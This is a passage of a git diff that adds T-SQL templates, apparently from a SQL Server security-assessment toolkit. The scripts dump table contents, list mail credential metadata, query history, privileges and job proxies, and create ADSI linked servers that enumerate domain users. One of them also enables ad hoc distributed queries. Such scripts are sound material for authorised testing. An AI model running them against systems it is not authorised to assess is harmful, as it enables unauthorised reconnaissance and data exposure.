@mytempname + WHILE @@FETCH_STATUS = 0 + BEGIN + + -- Print table name + PRINT @mytempname + + -- Select table contents + DECLARE @myname varchar(max) + SET @myname = 'SELECT * FROM [' + @mytempname + ']' + EXEC(@myname) + + -- Next record + FETCH NEXT FROM MY_CURSOR INTO @mytempname + END + CLOSE MY_CURSOR + DEALLOCATE MY_CURSOR +END + diff --git a/templates/tsql/Get-InstallationDate.sql b/templates/tsql/Get-InstallationDate.sql new file mode 100644 index 0000000..326237a --- /dev/null +++ b/templates/tsql/Get-InstallationDate.sql @@ -0,0 +1,34 @@ +-- Option 1: createdat FROM master.sys.syslogins +-- Tested version: 2022, 2016, 2014, 2012 +-- Requirements: sysadmin +-- Reference: https://www.dbrnd.com/2016/03/sql-server-script-to-find-installation-date-time-and-authentication-mode/ +SELECT + createdate AS InstallationDate + ,CASE SERVERPROPERTY('IsIntegratedSecurityOnly') + WHEN 1 THEN 'Windows Authentication' + WHEN 0 THEN 'Windows and SQL Server Authentication' + END AS AuthenticationMode + ,SERVERPROPERTY('servername') AS ServerName +FROM master.sys.syslogins +WHERE name LIKE 'NT AUTHORITY\SYSTEM' + + +-- Option 2: create_date FROM sys.server_principals +-- $server.VersionMajor -ge 9 +-- Tested version: 2022, 2016, 2014, 2012 +-- Requirements: sysadmin not required +-- Reference: https://github.com/dataplat/dbatools/blob/6cae0dd18bda3ad8efd60404c2d05b402cc4a785/functions/Get-DbaInstanceInstallDate.ps1 +/* +$sql = "SELECT create_date FROM sys.server_principals WHERE sid = 0x010100000000000512000000" +[DbaDateTime]$sqlInstallDate = $server.Query($sql, 'master', $true).create_date +*/ + +-- Option 3: schemadate FROM sysservers +-- $server.VersionMajor -le 9 +-- Tested version: 2022, 2016, 2014, 2012 +-- Requirements: sysadmin not required +--Reference: https://github.com/dataplat/dbatools/blob/6cae0dd18bda3ad8efd60404c2d05b402cc4a785/functions/Get-DbaInstanceInstallDate.ps1 +/* +$sql = "SELECT schemadate FROM sysservers" +[DbaDateTime]$sqlInstallDate = $server.Query($sql, 'master', $true).schemadate +*/ diff --git a/templates/tsql/Get-InstanceComputerSid.sql b/templates/tsql/Get-InstanceComputerSid.sql new file mode 100644 index 0000000..a2cd812 --- /dev/null +++ b/templates/tsql/Get-InstanceComputerSid.sql @@ -0,0 +1,5 @@ +-- The following command will recover the SID for the current computer account if it's assocaited with a Active Directory domain. +-- https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/ +-- Tested and works on: SQL Server 2012,2014,2016 +-- Currently failes on SQL Server 2008 +SELECT SUSER_SID(concat(DEFAULT_DOMAIN(),'\',cast(SERVERPROPERTY('MachineName') as varchar(max)),'$')) diff --git a/templates/tsql/Get-MailCredential.sql b/templates/tsql/Get-MailCredential.sql new file mode 100644 index 0000000..1b5ccdb --- /dev/null +++ b/templates/tsql/Get-MailCredential.sql @@ -0,0 +1,29 @@ +-- Script: Get-MailCredential.sql +-- Requirements: Sysadmin or required SELECT privileges. +-- Description: Returns a row for SMTP credential. Everything but the cleartext credential is shown. +-- Note: Tested on SQL Server 2008, 2012, 2014, 2016. + +SELECT c.name as credential_name, +c.credential_id, +ms.account_id, +ms.servertype, +ms.servername, +ms.port, +ms.username, +a.name, +a.display_name, +a.description, +a.email_address, +a.replyto_address, +ms.credential_id, +ms.use_default_credentials, +ms.enable_ssl, +ms.flags, +ms.last_mod_datetime, +ms.last_mod_user +FROM sys.credentials as c +JOIN msdb.dbo.sysmail_server as ms +ON c.credential_id = ms.credential_id +JOIN msdb.dbo.sysmail_account as a +ON ms.account_id = a.account_id +WHERE ms.servertype like 'SMTP' diff --git a/templates/tsql/Get-MyWindowsGroup.sql b/templates/tsql/Get-MyWindowsGroup.sql new file mode 100644 index 0000000..419a45e --- /dev/null +++ b/templates/tsql/Get-MyWindowsGroup.sql @@ -0,0 +1,4 @@ +-- Potentially runs nest group enumeration +-- this will show all the local and domain groups associated with the current login +-- https://www.sqlserver-dba.com/2018/05/how-to-get-the-ad-groups-of-a-login-with-syslogin_token.html +select * from sys.login_token diff --git a/templates/tsql/Get-PrincipalID2SqlLogin.sql b/templates/tsql/Get-PrincipalID2SqlLogin.sql new file mode 100644 index 0000000..9d1e2be --- /dev/null +++ b/templates/tsql/Get-PrincipalID2SqlLogin.sql @@ -0,0 +1,10 @@ +-- Script: Get-Principal2SqlLogin.sql +-- Description: Example showing how to get the sql login +-- for a given principal_id. +-- Reference: https://msdn.microsoft.com/en-us/library/ms179889.aspx + +SELECT SUSER_NAME(1) +SELECT SUSER_NAME(2) +SELECT SUSER_NAME(3) +SELECT SUSER_NAME(4) +SELECT SUSER_NAME(5) diff --git a/templates/tsql/Get-Proc.sql b/templates/tsql/Get-Proc.sql new file mode 100644 index 0000000..d5ca859 --- /dev/null +++ b/templates/tsql/Get-Proc.sql @@ -0,0 +1,14 @@ +-- Script: Get-Proc.sql +-- Description: Return a list of procedures for the current database. +-- Reference: https://msdn.microsoft.com/en-us/library/ms188757.aspx + +SELECT ROUTINE_CATALOG AS [DATABASE_NAME], + ROUTINE_SCHEMA AS [SCHEMA_NAME], + ROUTINE_NAME, + ROUTINE_TYPE, + ROUTINE_DEFINITION, + SQL_DATA_ACCESS, + ROUTINE_BODY, + CREATED, + LAST_ALTERED +FROM [INFORMATION_SCHEMA].[ROUTINES] diff --git a/templates/tsql/Get-ProcParameter.sql b/templates/tsql/Get-ProcParameter.sql new file mode 100644 index 0000000..3fd8f5e --- /dev/null +++ b/templates/tsql/Get-ProcParameter.sql @@ -0,0 +1,23 @@ +-- Script: Get-ProcParameter.sql +-- Description: Return stored procedures and parameter information +-- for the current database. +-- Reference: https://msdn.microsoft.com/en-us/library/ms190324.aspx +-- Reference: http://www.mssqltips.com/sqlservertip/1669/generate-a-parameter-list-for-all-sql-server-stored-procedures-and-functions/ +-- or just select * from INFORMATION_SCHEMA.PARAMETERS + +SELECT DB_NAME() as [DATABASE_NAME], + SCHEMA_NAME(SCHEMA_ID) AS [SCHEMA_NAME], + SO.name AS [ObjectName], + SO.Type_Desc AS [ObjectType (UDF/SP)], + P.parameter_id AS [ParameterID], + P.name AS [ParameterName], + TYPE_NAME(P.user_type_id) AS [ParameterDataType], + P.max_length AS [ParameterMaxBytes], + P.is_output AS [IsOutPutParameter] +FROM sys.objects AS SO +INNER JOIN sys.parameters AS P +ON SO.OBJECT_ID = P.OBJECT_ID +WHERE SO.OBJECT_ID IN ( SELECT OBJECT_ID + FROM sys.objects + WHERE TYPE IN ('P','FN')) +ORDER BY [SCHEMA_NAME], SO.name, P.parameter_id \ No newline at end of file diff --git a/templates/tsql/Get-ProcPriv.sql b/templates/tsql/Get-ProcPriv.sql new file mode 100644 index 0000000..1c3fe07 --- /dev/null +++ b/templates/tsql/Get-ProcPriv.sql @@ -0,0 +1,13 @@ +-- Script: Get-ProcPriv.sql +-- Description: Return list of privileges for procedures in current database. +-- Reference: https://msdn.microsoft.com/en-us/library/ms188367.aspx + +SELECT b.name AS [DATABASE_USER], + c.name AS [DATABASE_OBJECT_NAME], + a.permission_name AS [OBJECT_PERMISSION] +FROM [sys].[database_permissions] a +INNER JOIN [sys].[sysusers] b + ON a.[grantee_principal_id] = b.[uid] +INNER JOIN [sys].[sysobjects] c + ON a.[major_id] = c.[id] +ORDER BY [DATABASE_USER],[DATABASE_OBJECT_NAME] \ No newline at end of file diff --git a/templates/tsql/Get-ProcSigned.sql b/templates/tsql/Get-ProcSigned.sql new file mode 100644 index 0000000..b21240d --- /dev/null +++ b/templates/tsql/Get-ProcSigned.sql @@ -0,0 +1,23 @@ +-- Script: Get-ProcSigned.sql +-- Description: Return a list of signed stored procedures +-- for the current database. +-- Reference: https://books.google.com/books?id=lTtQXn2pO5kC&pg=PA158&dq=cp.thumbprint+%3D+cer.thumbprint+AND&hl=en&sa=X&ei=ID1tVeioDZCpogSO4oCgCA&ved=0CCcQ6AEwAA#v=onepage&q=cp.thumbprint%20%3D%20cer.thumbprint%20AND&f=false + +SELECT o.name as ObjectName, + o.type_desc as ObjectType, + cp.crypt_type as CryptType, + CASE cp.crypt_type + when 'SPVC' then cer.name + when 'CPVC' then Cer.name + when 'SPVA' then ak.name + when 'CPVA' then ak.name + END as keyname +FROM sys.crypt_properties cp +JOIN sys.objects o ON cp.major_id = o.object_id +LEFT JOIN sys.certificates cer + ON cp.thumbprint = cer.thumbprint + AND cp.crypt_type IN ('SPVC','CPVC') +LEFT JOIN sys.asymmetric_keys ak + ON cp.thumbprint = ak.thumbprint + AND cp.crypt_type IN ('SPVA','CPVA') +ORDER BY keyname,ObjectType,ObjectName \ No newline at end of file diff --git a/templates/tsql/Get-ProcSignedByCertLogin.sql b/templates/tsql/Get-ProcSignedByCertLogin.sql new file mode 100644 index 0000000..969f0b1 --- /dev/null +++ b/templates/tsql/Get-ProcSignedByCertLogin.sql @@ -0,0 +1,30 @@ +-- Script: Get-ProcSignedByCertLogin.sql +-- Description: Return a list of procedures signed with a certificate +-- for the current database that also have logins that were generated from them. +-- Reference: https://books.google.com/books?id=lTtQXn2pO5kC&pg=PA158&dq=cp.thumbprint+%3D+cer.thumbprint+AND&hl=en&sa=X&ei=ID1tVeioDZCpogSO4oCgCA&ved=0CCcQ6AEwAA#v=onepage&q=cp.thumbprint%20%3D%20cer.thumbprint%20AND&f=false + +SELECT spr.ROUTINE_CATALOG as [DATABASE_NAME], + spr.SPECIFIC_SCHEMA as [SCHEMA_NAME], + spr.ROUTINE_NAME as [SP_NAME], + spr.ROUTINE_DEFINITION as SP_CODE, + CASE cp.crypt_type + when 'SPVC' then cer.name + when 'CPVC' then Cer.name + when 'SPVA' then ak.name + when 'CPVA' then ak.name + END as CERT_NAME, + sp.name as CERT_LOGIN, + sp.sid as CERT_SID +FROM [sys].[crypt_properties] cp +INNER JOIN [sys].[objects] o ON cp.major_id = o.object_id +LEFT JOIN [sys].[certificates] cer + ON cp.thumbprint = cer.thumbprint +LEFT JOIN [sys].[asymmetric_keys] ak + ON cp.thumbprint = ak.thumbprint +LEFT JOIN [INFORMATION_SCHEMA].[ROUTINES] spr + ON spr.ROUTINE_NAME = o.name +LEFT JOIN [sys].[server_principals] sp + ON sp.sid = cer.sid +WHERE o.type_desc = 'SQL_STORED_PROCEDURE' + AND sp.name is NOT NULL +ORDER BY CERT_NAME \ No newline at end of file diff --git a/templates/tsql/Get-ProcSource.tsql b/templates/tsql/Get-ProcSource.tsql new file mode 100644 index 0000000..b255375 --- /dev/null +++ b/templates/tsql/Get-ProcSource.tsql @@ -0,0 +1,23 @@ + +-- Get list of procedures +SELECT * FROM sysobjects where type = 'p' + +-- Indirectly get sp source for procedures +sp_helptext 'sp_helptext' + +-- Indirectly get sp sourec for procedure or object +SELECT OBJECT_DEFINITION( + OBJECT_ID('sys.sysservers') + ) AS [Definition]; + +-- Directly get native sp source +SELECT * FROM master.sys.all_sql_modules + +-- Directly get native sp source +SELECT TEXT FROM master.sys.syscomments + +-- Directly get custom sp source +SELECT ROUTINE_CATALOG,SPECIFIC_SCHEMA,ROUTINE_NAME,ROUTINE_DEFINITION +FROM MASTER.INFORMATION_SCHEMA.ROUTINES +ORDER BY ROUTINE_NAME + diff --git a/templates/tsql/Get-QueryHistory.sql b/templates/tsql/Get-QueryHistory.sql new file mode 100644 index 0000000..612430a --- /dev/null +++ b/templates/tsql/Get-QueryHistory.sql @@ -0,0 +1,16 @@ +-- Script: Get-QueryHistory.sql +-- Requirements: Sysadmin or required SELECT privileges. +-- Description: Returns queries executed on the system. It should include all queries since the service was started. +-- Reference: http://blogs.lessthandot.com/index.php/datamgmt/dbprogramming/finding-out-how-many-times-a-table-is-be-2008/ + +SELECT * FROM + (SELECT + COALESCE(OBJECT_NAME(qt.objectid),'Ad-Hoc') AS objectname, + qt.objectid as objectid, + last_execution_time, + execution_count, + encrypted, + (SELECT TOP 1 SUBSTRING(qt.TEXT,statement_start_offset / 2+1,( (CASE WHEN statement_end_offset = -1 THEN (LEN(CONVERT(NVARCHAR(MAX),qt.TEXT)) * 2) ELSE statement_end_offset END)- statement_start_offset) / 2+1)) AS sql_statement + FROM sys.dm_exec_query_stats AS qs + CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS qt ) x +ORDER BY execution_count DESC diff --git a/templates/tsql/Get-RolePrivs b/templates/tsql/Get-RolePrivs new file mode 100644 index 0000000..f8866a9 --- /dev/null +++ b/templates/tsql/Get-RolePrivs @@ -0,0 +1,171 @@ +-- http://stackoverflow.com/questions/410396/public-role-access-in-sql-server +SELECT DISTINCT rp.name, + ObjectType = rp.type_desc, + PermissionType = pm.class_desc, + pm.permission_name, + pm.state_desc, + ObjectType = CASE + WHEN obj.type_desc IS NULL + OR obj.type_desc = 'SYSTEM_TABLE' THEN + pm.class_desc + ELSE obj.type_desc + END, + [ObjectName] = Isnull(ss.name, Object_name(pm.major_id)) +FROM sys.database_principals rp + INNER JOIN sys.database_permissions pm + ON pm.grantee_principal_id = rp.principal_id + LEFT JOIN sys.schemas ss + ON pm.major_id = ss.schema_id + LEFT JOIN sys.objects obj + ON pm.[major_id] = obj.[object_id] +order by objectname + +or + +/* + + +--Script source found at : http://stackoverflow.com/a/7059579/1387418 +Security Audit Report +1) List all access provisioned to a sql user or windows user/group directly +2) List all access provisioned to a sql user or windows user/group through a database or application role +3) List all access provisioned to the public role + +Columns Returned: +UserName : SQL or Windows/Active Directory user cccount. This could also be an Active Directory group. +UserType : Value will be either 'SQL User' or 'Windows User'. This reflects the type of user defined for the + SQL Server user account. +DatabaseUserName: Name of the associated user as defined in the database user account. The database user may not be the + same as the server user. +Role : The role name. This will be null if the associated permissions to the object are defined at directly + on the user account, otherwise this will be the name of the role that the user is a member of. +PermissionType : Type of permissions the user/role has on an object. Examples could include CONNECT, EXECUTE, SELECT + DELETE, INSERT, ALTER, CONTROL, TAKE OWNERSHIP, VIEW DEFINITION, etc. + This value may not be populated for all roles. Some built in roles have implicit permission + definitions. +PermissionState : Reflects the state of the permission type, examples could include GRANT, DENY, etc. + This value may not be populated for all roles. Some built in roles have implicit permission + definitions. +ObjectType : Type of object the user/role is assigned permissions on. Examples could include USER_TABLE, + SQL_SCALAR_FUNCTION, SQL_INLINE_TABLE_VALUED_FUNCTION, SQL_STORED_PROCEDURE, VIEW, etc. + This value may not be populated for all roles. Some built in roles have implicit permission + definitions. +ObjectName : Name of the object that the user/role is assigned permissions on. + This value may not be populated for all roles. Some built in roles have implicit permission + definitions. +ColumnName : Name of the column of the object that the user/role is assigned permissions on. This value + is only populated if the object is a table, view or a table value function. +*/ + +--List all access provisioned to a sql user or windows user/group directly +SELECT + [UserName] = CASE princ.[type] + WHEN 'S' THEN princ.[name] + WHEN 'U' THEN ulogin.[name] COLLATE Latin1_General_CI_AI + END, + [UserType] = CASE princ.[type] + WHEN 'S' THEN 'SQL User' + WHEN 'U' THEN 'Windows User' + END, + [DatabaseUserName] = princ.[name], + [Role] = null, + [PermissionType] = perm.[permission_name], + [PermissionState] = perm.[state_desc], + [ObjectType] = obj.type_desc,--perm.[class_desc], + [ObjectName] = OBJECT_NAME(perm.major_id), + [ColumnName] = col.[name] +FROM + --database user + sys.database_principals princ +LEFT JOIN + --Login accounts + sys.login_token ulogin on princ.[sid] = ulogin.[sid] +LEFT JOIN + --Permissions + sys.database_permissions perm ON perm.[grantee_principal_id] = princ.[principal_id] +LEFT JOIN + --Table columns + sys.columns col ON col.[object_id] = perm.major_id + AND col.[column_id] = perm.[minor_id] +LEFT JOIN + sys.objects obj ON perm.[major_id] = obj.[object_id] +WHERE + princ.[type] in ('S','U') +UNION +--List all access provisioned to a sql user or windows user/group through a database or application role +SELECT + [UserName] = CASE memberprinc.[type] + WHEN 'S' THEN memberprinc.[name] + WHEN 'U' THEN ulogin.[name] COLLATE Latin1_General_CI_AI + END, + [UserType] = CASE memberprinc.[type] + WHEN 'S' THEN 'SQL User' + WHEN 'U' THEN 'Windows User' + END, + [DatabaseUserName] = memberprinc.[name], + [Role] = roleprinc.[name], + [PermissionType] = perm.[permission_name], + [PermissionState] = perm.[state_desc], + [ObjectType] = obj.type_desc,--perm.[class_desc], + [ObjectName] = OBJECT_NAME(perm.major_id), + [ColumnName] = col.[name] +FROM + --Role/member associations + sys.database_role_members members +JOIN + --Roles + sys.database_principals roleprinc ON roleprinc.[principal_id] = members.[role_principal_id] +JOIN + --Role members (database users) + sys.database_principals memberprinc ON memberprinc.[principal_id] = members.[member_principal_id] +LEFT JOIN + --Login accounts + sys.login_token ulogin on memberprinc.[sid] = ulogin.[sid] +LEFT JOIN + --Permissions + sys.database_permissions perm ON perm.[grantee_principal_id] = roleprinc.[principal_id] +LEFT JOIN + --Table columns + sys.columns col on col.[object_id] = perm.major_id + AND col.[column_id] = perm.[minor_id] +LEFT JOIN + sys.objects obj ON perm.[major_id] = obj.[object_id] +UNION +--List all access provisioned to the public role, which everyone gets by default +SELECT + [UserName] = '{All Users}', + [UserType] = '{All Users}', + [DatabaseUserName] = '{All Users}', + [Role] = roleprinc.[name], + [PermissionType] = perm.[permission_name], + [PermissionState] = perm.[state_desc], + [ObjectType] = obj.type_desc,--perm.[class_desc], + [ObjectName] = OBJECT_NAME(perm.major_id), + [ColumnName] = col.[name] +FROM + --Roles + sys.database_principals roleprinc +LEFT JOIN + --Role permissions + sys.database_permissions perm ON perm.[grantee_principal_id] = roleprinc.[principal_id] +LEFT JOIN + --Table columns + sys.columns col on col.[object_id] = perm.major_id + AND col.[column_id] = perm.[minor_id] +JOIN + --All objects + sys.objects obj ON obj.[object_id] = perm.[major_id] +WHERE + --Only roles + roleprinc.[type] = 'R' AND + --Only public role + roleprinc.[name] = 'public' AND + --Only objects of ours, not the MS objects + obj.is_ms_shipped = 0 +ORDER BY + princ.[Name], + OBJECT_NAME(perm.major_id), + col.[name], + perm.[permission_name], + perm.[state_desc], + obj.type_desc--perm.[class_desc] diff --git a/templates/tsql/Get-SID2WinAccount.sql b/templates/tsql/Get-SID2WinAccount.sql new file mode 100644 index 0000000..473ffa1 --- /dev/null +++ b/templates/tsql/Get-SID2WinAccount.sql @@ -0,0 +1,6 @@ +-- Script: Get-SID2WinAccount.sql +-- Description: Example showing how to get the domain user or group +-- for a given sid. +-- Reference: https://msdn.microsoft.com/en-us/library/ms179889.aspx + +SELECT SUSER_SNAME(0x010500000000000515000000F3864381DA1516CC636051C000020000) \ No newline at end of file diff --git a/templates/tsql/Get-SQLAgentJobProxy.tsql b/templates/tsql/Get-SQLAgentJobProxy.tsql new file mode 100644 index 0000000..775ce14 --- /dev/null +++ b/templates/tsql/Get-SQLAgentJobProxy.tsql @@ -0,0 +1,30 @@ + -- Get-SQLAgentJobProxy + -- Ref:http://dba.stackexchange.com/questions/137675/how-to-find-what-sql-jobs-are-using-a-specific-account-as-proxy + + -- Search Credentials (shows account for Name) + + use msdb + select * + from sys.credentials + + --Search Jobs where there is a 'Run As' proxy and get the name of that proxy + + use msdb + + select sysjobsteps.job_id + , sysjobs.name as 'JobName' + , sysjobsteps.step_id + , sysjobsteps.step_name + , sysjobsteps.subsystem + , sysjobsteps.last_run_date + , sysjobsteps.proxy_id + --, sysjobsteps.step_uid + , sysproxies.name as 'ProxyName' + + from sysjobsteps + left join dbo.sysproxies + on sysjobsteps.proxy_id = sysproxies.proxy_id + left join dbo.sysjobs + on sysjobsteps.job_id = sysjobs.job_id + + where sysjobsteps.proxy_id > 0 diff --git a/templates/tsql/Get-SQLDomainUser-Example.sql b/templates/tsql/Get-SQLDomainUser-Example.sql new file mode 100644 index 0000000..b1f7d4c --- /dev/null +++ b/templates/tsql/Get-SQLDomainUser-Example.sql @@ -0,0 +1,115 @@ + +-- Script: Get-SQLDomainUser-Example.sql +-- Description: Use OLE DB ADSI connections to grab a list of domain users via SQL Server links (OpenQuery) and adhoc queries (OpenRowSet). +-- Author: Scott Sutherland, NetSPI 2017 + + +-------------------------------------- +-- Create SQL Server link to ADSI +-------------------------------------- +IF (SELECT count(*) FROM master..sysservers WHERE srvname = 'ADSI') = 0 + EXEC master.dbo.sp_addlinkedserver @server = N'ADSI', + @srvproduct=N'Active Directory Service Interfaces', + @provider=N'ADSDSOObject', + @datasrc=N'adsdatasource' +ELSE + SELECT 'The target SQL Server link already exists.' +GO + +-- Verify the link was created +SELECT * FROM master..sysservers WHERE providername = 'ADSDSOObject' + +-- Configure ADSI link to Authenticate as current user +EXEC sp_addlinkedsrvlogin + @rmtsrvname=N'ADSI', + @useself=N'True', + @locallogin=NULL, + @rmtuser=NULL, + @rmtpassword=NULL +GO + + +-------------------------------------- +-- Create SQL Server link to ADSI2 +-------------------------------------- +IF (SELECT count(*) FROM master..sysservers WHERE srvname = 'ADSI2') = 0 + EXEC master.dbo.sp_addlinkedserver @server = N'ADSI2', + @srvproduct=N'Active Directory Service Interfaces', + @provider=N'ADSDSOObject', + @datasrc=N'adsdatasource' +ELSE + SELECT 'The target SQL Server link already exists.' + -- EXEC master.dbo.sp_dropserver @server=N'ADSI', @droplogins='droplogins' + +GO + +-- Verify the link was created +SELECT * FROM master..sysservers WHERE providername = 'ADSDSOObject' + +-- Configure the ADSI2 link to Authenticate as provided domain user +EXEC sp_addlinkedsrvlogin +@rmtsrvname=N'ADSI2', +@useself=N'False', +@locallogin=NULL, +@rmtuser=N'Domain\User', +@rmtpassword=N'Password123!' +GO + + +-------------------------------------- +-- Run basic LDAP queries - OpenQuery +-------------------------------------- + +-- sa as current failed, but sysadmin domain user works +SELECT * FROM OpenQuery(ADSI,';(&(objectCategory=Person)(objectClass=user));samaccountname,name,admincount,whencreated,whenchanged,adspath;subtree') + +-- provided domain user works +SELECT * FROM OpenQuery(ADSI2,';(&(objectCategory=Person)(objectClass=user));samaccountname,name,admincount,whencreated,whenchanged,adspath;subtree') + +-- sa as current failed, but sysadmin domain user works +SELECT * FROM OpenQuery(ADSI, 'SELECT samaccountname,name,admincount,whencreated,whenchanged,adspath FROM ''LDAP://domain'' WHERE objectClass = ''User'' ') AS tblADSI + +-- provided domain user works +SELECT * FROM OpenQuery(ADSI2, 'SELECT samaccountname,name,admincount,whencreated,whenchanged,adspath FROM ''LDAP://domain'' WHERE objectClass = ''User'' ') AS tblADSI + + +-------------------------------------- +-- Remove links and login mappings +-------------------------------------- +EXEC master.dbo.sp_dropserver @server=N'ADSI', @droplogins='droplogins' +EXEC master.dbo.sp_dropserver @server=N'ADSI2', @droplogins='droplogins' + + +-------------------------------------- +-- Enabled adhoc queries on the server +-------------------------------------- +EXEC master.sys.sp_configure 'Show Advanced Options',1 +reconfigure +go + +EXEC master.sys.sp_configure 'Ad Hoc Distributed Queries',1 +reconfigure +go + + +-------------------------------------- +-- Run basic LDAP queries - OpenRowSet +-------------------------------------- +-- Need to confirm which scenario run as service account. + +-- Run without credential in syntax option 1 - works as sa +SELECT * +FROM OPENROWSET('ADSDSOOBJECT','adsdatasource','SELECT samaccountname,name,admincount,whencreated,whenchanged,adspath +FROM ''LDAP://domain'' +WHERE objectClass = ''User'' ') + +-- Run with credential in syntax option 1 - works as sa +SELECT * +FROM OPENROWSET('ADSDSOOBJECT','User ID=domain\user; Password=Password123!;','SELECT samaccountname,name,admincount,whencreated,whenchanged,adspath +FROM ''LDAP://domain'' +WHERE objectClass = ''User'' ') + +-- Run with credential in synatx option 2 - works as sa login +SELECT * +FROM OPENROWSET('ADSDSOOBJECT','User ID=domain\user; Password=Password123!;', +';(&(objectCategory=Person)(objectClass=user));samaccountname,name,admincount,whencreated,whenchanged,adspath;subtree') diff --git a/templates/tsql/Get-SQLForcedEncryptionSetting.sql b/templates/tsql/Get-SQLForcedEncryptionSetting.sql new file mode 100644 index 0000000..30a95e6 --- /dev/null +++ b/templates/tsql/Get-SQLForcedEncryptionSetting.sql @@ -0,0 +1,17 @@ +-- Script: Get-SQLForcedEncryptionSetting.sql +-- Description: Get the "Forced Encryption" setting for the current SQL Server instance. +-- Author: Scott Sutherland, NetSPI 2018 + +BEGIN TRY + DECLARE @ForcedEncryption INT + EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', + N'SOFTWARE\MICROSOFT\Microsoft SQL Server\MSSQLServer\SuperSocketNetLib', + N'ForceEncryption', @ForcedEncryption OUTPUT + + SELECT @ForcedEncryption as ForcedEncryption +END TRY +BEGIN CATCH + SELECT + ERROR_NUMBER() AS ErrorNumber + ,ERROR_MESSAGE() AS ErrorMessage; +END CATCH diff --git a/templates/tsql/Get-SQLOleDbProvider.sql b/templates/tsql/Get-SQLOleDbProvider.sql new file mode 100644 index 0000000..f73f59f --- /dev/null +++ b/templates/tsql/Get-SQLOleDbProvider.sql @@ -0,0 +1,119 @@ +-- Name: Get-SQLOleDbProvider.sql +-- Description: Get a list of OLE DB providers along with their properties. +-- This query combines the output of sp_MSset_oledb_prop and sp_enum_oledb_providers. +-- Requirements: Sysadmin privileges. +-- Author: Scott Sutherland, NetSPI 2017 + +-- Get a list of providers +CREATE TABLE #Providers ([ProviderName] varchar(8000), +[ParseName] varchar(8000), +[ProviderDescription] varchar(8000)) + +INSERT INTO #Providers +EXEC xp_enum_oledb_providers + +-- Create temp table for provider information +CREATE TABLE #ProviderInformation ([ProviderName] varchar(8000), +[ProviderDescription] varchar(8000), +[ProviderParseName] varchar(8000), +[AllowInProcess] int, +[DisallowAdHocAccess] int, +[DynamicParameters] int, +[IndexAsAccessPath] int, +[LevelZeroOnly] int, +[NestedQueries] int, +[NonTransactedUpdates] int, +[SqlServerLIKE] int) + +-- Setup required variables for cursor +DECLARE @Provider_name varchar(8000); +DECLARE @Provider_parse_name varchar(8000); +DECLARE @Provider_description varchar(8000); +DECLARE @property_name varchar(8000) +DECLARE @regpath nvarchar(512) + +-- Start cursor +DECLARE MY_CURSOR1 CURSOR +FOR +SELECT * FROM #Providers +OPEN MY_CURSOR1 +FETCH NEXT FROM MY_CURSOR1 INTO @Provider_name,@Provider_parse_name,@Provider_description +WHILE @@FETCH_STATUS = 0 + + BEGIN + + -- Set the registry path + SET @regpath = N'SOFTWARE\Microsoft\MSSQLServer\Providers\' + @provider_name + + -- AllowInProcess + DECLARE @AllowInProcess int + SET @AllowInProcess = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'AllowInProcess', @AllowInProcess OUTPUT + IF @AllowInProcess IS NULL + SET @AllowInProcess = 0 + + -- DisallowAdHocAccess + DECLARE @DisallowAdHocAccess int + SET @DisallowAdHocAccess = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'DisallowAdHocAccess', @DisallowAdHocAccess OUTPUT + IF @DisallowAdHocAccess IS NULL + SET @DisallowAdHocAccess = 0 + + -- DynamicParameters + DECLARE @DynamicParameters int + SET @DynamicParameters = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'DynamicParameters', @DynamicParameters OUTPUT + IF @DynamicParameters IS NULL + SET @DynamicParameters = 0 + + -- IndexAsAccessPath + DECLARE @IndexAsAccessPath int + SET @IndexAsAccessPath = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'IndexAsAccessPath', @IndexAsAccessPath OUTPUT + IF @IndexAsAccessPath IS NULL + SET @IndexAsAccessPath = 0 + + -- LevelZeroOnly + DECLARE @LevelZeroOnly int + SET @LevelZeroOnly = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'LevelZeroOnly', @LevelZeroOnly OUTPUT + IF @LevelZeroOnly IS NULL + SET @LevelZeroOnly = 0 + + -- NestedQueries + DECLARE @NestedQueries int + SET @NestedQueries = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'NestedQueries', @NestedQueries OUTPUT + IF @NestedQueries IS NULL + SET @NestedQueries = 0 + + -- NonTransactedUpdates + DECLARE @NonTransactedUpdates int + SET @NonTransactedUpdates = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'NonTransactedUpdates', @NonTransactedUpdates OUTPUT + IF @NonTransactedUpdates IS NULL + SET @NonTransactedUpdates = 0 + + -- SqlServerLIKE + DECLARE @SqlServerLIKE int + SET @SqlServerLIKE = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'SqlServerLIKE', @SqlServerLIKE OUTPUT + IF @SqlServerLIKE IS NULL + SET @SqlServerLIKE = 0 + + -- Add the full provider record to the temp table + INSERT INTO #ProviderInformation + VALUES (@Provider_name,@Provider_description,@Provider_parse_name,@AllowInProcess,@DisallowAdHocAccess,@DynamicParameters,@IndexAsAccessPath,@LevelZeroOnly,@NestedQueries,@NonTransactedUpdates,@SqlServerLIKE); + + FETCH NEXT FROM MY_CURSOR1 INTO @Provider_name,@Provider_parse_name,@Provider_description + + END + +-- Return records +SELECT * FROM #ProviderInformation + +-- Clean up +CLOSE MY_CURSOR1 +DEALLOCATE MY_CURSOR1 +DROP TABLE #Providers +DROP TABLE #ProviderInformation diff --git a/templates/tsql/Get-SQLPolicies.sql b/templates/tsql/Get-SQLPolicies.sql new file mode 100644 index 0000000..1109d20 --- /dev/null +++ b/templates/tsql/Get-SQLPolicies.sql @@ -0,0 +1,28 @@ + +/* + Script: Get-SQLPolicies.sql + Description: List the SQL Server management policies in place. + Author: Scott Sutherland, 2017 +*/ + +SELECT p.policy_id, + p.name as [PolicyName], + p.condition_id, + c.name as [ConditionName], + c.facet, + c.expression as [ConditionExpression], + p.root_condition_id, + p.is_enabled, + p.date_created, + p.date_modified, + p.description, + p.created_by, + p.is_system, + t.target_set_id, + t.TYPE, + t.type_skeleton +FROM msdb.dbo.syspolicy_policies p +INNER JOIN syspolicy_conditions c + ON p.condition_id = c.condition_id +INNER JOIN 